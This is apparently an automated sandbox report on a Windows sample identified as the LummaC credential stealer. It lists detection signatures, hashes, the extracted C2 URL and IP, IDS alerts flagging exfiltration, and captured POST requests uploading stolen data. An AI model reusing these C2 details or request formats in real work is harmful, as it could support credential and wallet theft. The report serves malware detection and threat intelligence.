Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561593
MD5:5e73b0576450ed5ffd50f136a205a42e
SHA1:44d41e87ac4a7606006f77c5c49791e1389292b9
SHA256:e83261e251f282c7c4f68bb8ba9ab58577cba92e863c1cfd488d6ce6de7192ef
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5E73B0576450ED5FFD50F136A205A42E)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7616JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 7616JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7616JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:07.550595+010020283713Unknown Traffic192.168.2.1049700104.21.33.116443TCP
            2024-11-23T21:08:09.568329+010020283713Unknown Traffic192.168.2.1049701104.21.33.116443TCP
            2024-11-23T21:08:12.272141+010020283713Unknown Traffic192.168.2.1049703104.21.33.116443TCP
            2024-11-23T21:08:14.599423+010020283713Unknown Traffic192.168.2.1049709104.21.33.116443TCP
            2024-11-23T21:08:17.273606+010020283713Unknown Traffic192.168.2.1049715104.21.33.116443TCP
            2024-11-23T21:08:19.821441+010020283713Unknown Traffic192.168.2.1049721104.21.33.116443TCP
            2024-11-23T21:08:22.919051+010020283713Unknown Traffic192.168.2.1049733104.21.33.116443TCP
            2024-11-23T21:08:29.620128+010020283713Unknown Traffic192.168.2.1049748104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:08.275185+010020546531A Network Trojan was detected192.168.2.1049700104.21.33.116443TCP
            2024-11-23T21:08:10.328267+010020546531A Network Trojan was detected192.168.2.1049701104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:08.275185+010020498361A Network Trojan was detected192.168.2.1049700104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:10.328267+010020498121A Network Trojan was detected192.168.2.1049701104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:13.160352+010020480941Malware Command and Control Activity Detected192.168.2.1049703104.21.33.116443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T21:08:22.923838+010028438641A Network Trojan was detected192.168.2.1049733104.21.33.116443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeAvira: detected
            Source: file.exe.7616.5.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: file.exeJoe Sandbox ML: detected
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49733 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax5_2_0030B8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx5_2_0030B8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]5_2_002D98F0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]5_2_002DE0D8
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]5_2_002DE35B
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl5_2_002DCF05
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax5_2_002DC02B
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax5_2_0030B860
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al5_2_002F0870
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh5_2_0030C040
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh5_2_0030C040
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h5_2_0030C040
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh5_2_0030C040
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax5_2_0030F8D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax5_2_0030F8D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]5_2_002DE970
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx5_2_002DEA38
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl5_2_002F8CB0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx5_2_002DBC9D
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp5_2_002D5C90
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp5_2_002D5C90
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h5_2_0030BCE0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]5_2_002DAD00
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]5_2_002F5E90
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]5_2_00310F60
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]5_2_002D77D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax5_2_002D77D0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49703 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49701 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49701 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49700 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49700 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:49733 -> 104.21.33.116:443
            Source: Malware configuration extractorURLs: https://property-imper.sbs/api
            Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49709 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49700 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49715 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49733 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49721 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 104.21.33.116:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49748 -> 104.21.33.116:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JA37Y1KT9ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86UOV4B9XX35O2AYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15068Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KAJTQ45B64User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20394Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KPU5JZ60User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1190Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YN7UDN0HV85XOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586157Host: property-imper.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000005.00000003.1380636626.000000000571D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000005.00000003.1382248273.0000000005611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
            Source: file.exe, 00000005.00000002.1522481301.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1521017261.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518956356.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430570336.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430618094.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1454346053.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1410030452.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1519174505.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
            Source: file.exe, 00000005.00000002.1522481301.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/6
            Source: file.exe, 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000002.1522746121.0000000000C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
            Source: file.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api4c
            Source: file.exe, 00000005.00000003.1518956356.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1518592008.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1454188525.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000002.1522911134.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1520960231.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api=c
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiU
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apie
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apisbs0
            Source: file.exe, 00000005.00000003.1380323246.0000000005690000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1380186415.000000000568C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
            Source: file.exe, 00000005.00000003.1379663950.000000000568C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiL
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000005.00000003.1330872579.000000000564A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330607643.000000000564D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1330737451.000000000564A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000005.00000003.1381910650.0000000005932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.10:49733 version: TLS 1.2

            System Summary

            barindex
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C980005_3_00C98000
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C991305_3_00C99130
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003090305_2_00309030
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D40405_2_002D4040
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0030B8E05_2_0030B8E0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D98F05_2_002D98F0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002DE0D85_2_002DE0D8
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D89A05_2_002D89A0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00310C805_2_00310C80
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002E95305_2_002E9530
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F3D705_2_002F3D70
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003115805_2_00311580
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002DCF055_2_002DCF05
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F87705_2_002F8770
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F17905_2_002F1790
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A204E5_2_004A204E
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002F08705_2_002F0870
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D68405_2_002D6840
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0030C0405_2_0030C040
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0030F8D05_2_0030F8D0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0049616A5_2_0049616A
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002DE9705_2_002DE970
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003DF1BA5_2_003DF1BA
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D61A05_2_002D61A0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_003041D05_2_003041D0
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004731BE5_2_004731BE
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0049EA695_2_0049EA69
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00449A655_2_00449A65
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002D92105_2_002D9210
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_002DB2105_2_002DB210
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_004A3AD45_2_004A3AD4
